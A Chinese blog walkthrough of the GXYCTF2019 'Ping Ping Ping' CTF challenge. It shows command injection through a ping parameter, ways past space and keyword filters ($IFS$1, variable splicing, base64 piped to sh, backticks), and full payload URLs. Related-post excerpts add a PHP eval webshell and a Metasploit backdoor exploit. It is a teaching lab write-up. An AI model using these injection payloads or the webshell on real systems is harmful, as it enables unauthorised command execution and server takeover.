[GXYCTF2019]Ping Ping Ping(远程命令执行)

最新推荐文章于 2023-10-02 11:53:11 发布
最新推荐文章于 2023-10-02 11:53:11 发布
阅读量629 收藏 3
点赞数 2
分类专栏: BUUCTF-WEB 文章标签: php linux 安全漏洞 base64 bash
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45253573/article/details/109678494
版权

打开环境
在这里插入图片描述
先ping一下本地
http://0ce37cff-0de4-420e-9a38-09b7bc30030f.node3.buuoj.cn//?ip=127.0.0.1
在这里插入图片描述
利用分号执行多命令
http://0ce37cff-0de4-420e-9a38-09b7bc30030f.node3.buuoj.cn//?ip=127.0.0.1;ls
在这里插入图片描述
直接cat
http://0ce37cff-0de4-420e-9a38-09b7bc30030f.node3.buuoj.cn//?ip=127.0.0.1;cat%20flag.php
在这里插入图片描述
过滤了空格
有几个绕过空格的方法:
$IFS
${IFS}
$IFS$1 这个数字换成别的都可以
<
<>
{cat,flag.php}
%20
%09
IFS 是一种 set 变量,当 shell 处理"命令替换"和"参数替换"时,shell 根据 IFS 的值,默认是 space, tab, newline 来拆解读入的变量,然后对特殊字符进行处理,最后重新组合赋值给该变量

Shell中的$0$1$2的含义
$0        Shell本身的文件名
$1$n 添加到Shell的各参数值。$1是第1参数、$2是第2参数…
$$        Shell本身的PID(ProcessID) 
$!         Shell最后运行的后台Process的PID
$?         上个命令的退出状态,或函数的返回值 $- 使用Set命令设定的Flag一览
$*         所有参数列表,不包括脚本本身。如"$*"用「"」括起来的情况、以"$1 $2$n"的形式输出所有数。
$@       所有参数列表。如"$@"用「"」括起来的情况、以"$1" "$2""$n" 的形式输出所有参数。
$#        Shell的参数个数

先使用第一个绕过方法

http://0ce37cff-0de4-420e-9a38-09b7bc30030f.node3.buuoj.cn//?ip=127.0.0.1;cat$IFSflag.php
在这里插入图片描述
看来flag也被过滤掉了

cat一下index.php
http://0ce37cff-0de4-420e-9a38-09b7bc30030f.node3.buuoj.cn//?ip=127.0.0.1;cat$IFSindex.php
没反应,换一个空格绕过方法:
http://0ce37cff-0de4-420e-9a38-09b7bc30030f.node3.buuoj.cn//?ip=127.0.0.1;cat{IFS}index.php
在这里插入图片描述
{}也被过滤了
尝试$IFS$1

http://0ce37cff-0de4-420e-9a38-09b7bc30030f.node3.buuoj.cn//?ip=127.0.0.1;cat$IFS$1index.php

在这里插入图片描述
成功打开,看来过滤了很多字符啊
方法1:

但是可以看到有一个$a的变量,可以将变量a赋值g,赋值给其他的字母全失败了,猜测是怕混淆吧,赋值给g之后$a后面就是.php,就不怕混淆了。

构造payload:
http://0ce37cff-0de4-420e-9a38-09b7bc30030f.node3.buuoj.cn//?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php
flag在源码里
在这里插入图片描述
方法2:
index.php看到/bash/命令被过滤了
但是可以使用sh
先将cat flag.php base64编码Y2F0IGZsYWcucGhw
构造payload:
http://0ce37cff-0de4-420e-9a38-09b7bc30030f.node3.buuoj.cn//?ip=127.0.0.1;echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh
flag在源码里
在这里插入图片描述
方法3:内联注入

http://0ce37cff-0de4-420e-9a38-09b7bc30030f.node3.buuoj.cn//?ip=127.0.0.1;cat$IFS$1`ls`

inux下反引号``里面包含的就是需要执行的系统命令

先执行反引号里面的命令,也就是先ls,然后cat两个文件。

哇gg
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2021-08-29 网安实验-Linux系统渗透测试之Metasploit攻击linux实例
时光隧道
08-29 8万+
一:扫描端口 nmap -sT -v 10.1.1.136 扫描漏洞主机开放端口信息,扫描结果如下: 其中6667号端口开放IRC服务,可以利用UnrealIRCD IRC软件的漏洞来攻击漏洞主机。 二:UnrealIRCd后门漏洞 1.输入msfconsole命令 2.运行“search unrealircd”命令 3.运行“use exploit/unix/irc/unreal_ircd_3281_backdoor”命令开始运行EXP 4.使用“show options“ 命令查看该expl
[GXYCTF2019]Ping Ping Ping {命令执行总结}
qq_42812036的博客
02-13 5894
0x00 知识点 命令注入 绕过空格、敏感字符、连接符 0x01 解题 方法一 内联执行 payload ?ip=1;a=f;d=ag;c=l;cat$IFS$a$c$d.php ps: 参数顺序要注意,adc换位acdflag会被检测出来:) 过滤了?/\{}()[]* 否则bash语法可以用“?”,正斜杠“/”,数字和字母来执行系统命令。 过滤空格 1.使用<或者<&gt...
GXYCTF2019--Ping Ping Ping
Oavinci的博客
06-16 488
知识点: 命令执行漏洞 空格以及字符串的绕过 ?ip=127.0.0.1 ?ip=127.0.0.1|ls ?ip=127.0.0.1|cat flag.php 显示不可以有空格 测试一下发现可以代替空格的形式 $IFS ${IFS} $IFS$1 //$1改成$加其他数字貌似都行 < <> {cat,flag.php}//用逗号实现了空格功能 %20 %09 /**/ %0a $IFS$9成功( $IFS...
网安入门20——RCE(命令执行Ping
最新发布
m0_61499194的博客
10-02 881
源码分析:源代码中先对操作系统进行校验,如果是Windos默认ping4次,Linux系统则是现需要手动设置发包次数,传入的ip未作处理,直接拼接到系统命令中,未作任何处理,最后用shell_exec()执行命令,与system()命令类似,可以直接执行系统层面命令。这种漏洞可能导致严重的安全问题,因此开发人员需要采取适当的防御措施来防止命令执行漏洞的发生。为了防止命令执行漏洞,开发人员应该对用户输入进行严格的验证和过滤,确保输入的数据符合预期的格式和范围。命令执行是在目标服务器上任意执行系统命令
BUUCTF之Ping Ping Ping
金 帛的博客
02-20 6666
BUUCTFWP,关于一些waf的绕过
rce命令执行
WEB渗透测试 从入门到萌新
04-07 1599
概述 RCE(remote command/code execute)漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。 远程系统命令执行 一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口 比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上 一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。 而,如果,设计者在完成该功能时,没有做严格的安全控
buu(rce命令执行)
qq_62046696的博客
09-02 369
-oG h.php 忘记了php被过滤,后缀也一样,用phtml代替127.0.0.1
[GXYCTF2019]Ping Ping Ping
m0_56375816的博客
01-06 2472
观察页面 看到页面上没有什么输入点,只有一个/?Ip,题目又是ping,可能是ping地址,尝试把页面上的格式输入,再随便写一个地址,如/?ip=210.0.0.1 这与cmd中ping测试相似,但是真的pingping不通的,搜ip是有的,应该是一个开了禁ping的,方向应该是正确的。而且应该是假ping。 2.找文件 可以利用拼接命令,在/?ip=210.0.0.1后面用拼接符与查看命令连接起来 & 表示任务在后台执行,如要在后台运行redis-serv...
Ping命令实现的扩充
09-27
实验内容:Ping命令实现的扩充,在给定的Ping程序的基础上做如下功能扩充: ? -h 显示帮助信息 ? -b 允许ping一个广播地址,只用于IPv4 ? -t 设置ttl值,只用于IPv4 ? -q 安静模式。不显示每个收到的包的分析结果,...
ping命令 测试主机间网络连通性
01-09
ping命令主要用来测试主机之间网络的连通性,也可以用于。执行ping指令会使用ICMP传输协议,发出要求回应的信息,若远端主机的网络功能没有问题,就会回应该信息,因而得知该主机运作正常。 不过值得我们注意的是:...
ping 命令-综合文档
05-24
3. **命令执行示例** - `ping www.yesky.com`:将尝试连接到www.yesky.com的服务器,返回其IP地址(如210.77.155.200)以及往返时间等信息。 4. **结果解析** - `Pinging [目标IP] with 32 bytes of data`: 表示...
计算机Ping命令使用详解.docx
03-01
计算机Ping命令使用详解 计算机Ping命令是TCP/IP协议中的一个强大工具,用于检测网络的连通情况和分析网络速度。Ping命令的主要作用有三个方面: 1. 检测网络的连通情况和分析网络速度:Ping命令可以用来检测网络...
带参数的ping命令的实现
12-01
环境:在虚拟机上安装,ubuntu内容:里面包含完整的代码实现,可直接运行,包含完整的课设报告。
[GXYCTF 2019]Ping Ping Ping
m0_62422842的博客
05-08 7875
前言 最近在学习ssrf漏洞,这个漏洞的综合性还是挺强的。在网上看了大佬的文章总结的很详细。在此基础就通过实践相结合,更加深入的理解ssrf的具体操作。 SSRF漏洞 有一些函数比如
初学RCE(远程命令/代码执行漏洞)
热门推荐
qq_43814486的博客
05-09 5万+
RCE英文全称:remote command/code execute 漏洞出现的原因: 我们常见的路由器、防火墙、入侵检测等设备的web管理界面上 一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。这就是一个接口,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。,这就是RCE漏洞...
ctf-ping命令执行
qq_45414878的博客
11-08 9491
[GXYCTF2019]Ping Ping Ping 现在做一下关于常见的绕过ping执行其他命令的姿势,启动环境,连接并输入参数,查看当前目录下都有什么 ls命令没有被过滤,并且知道flag就在这个目录下面,用cat查看的flag的时候发现空格被禁用,绕过空格常用的方法有 {cat,flag.php} cat${IFS}flag.php cat$IFS$9flag.php cat<flag.php cat<>flag.php kg=$'\x20flag.php'&&c
[极客大挑战 2019]Upload 1(文件上传)
weixin_45253573的博客
12-08 1万+
打开环境是一个上传图片的页面。 先上传一句话木马试试,这里格式直接不变,先上传看看。 <?php eval($_POST['b'])?> <?php $_GET['a']($_POST['b'])?> 提示说不是图片,需要抓包改文件格式。将Content-Type里面的格式改为image/jpeg 绕过后缀的有文件格式有php,php3,php4,php5,phtml.pht 前几个php格式的一句话都被b了,比如php3 将文件格式改到phtml可以了,但带<?的一句话

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值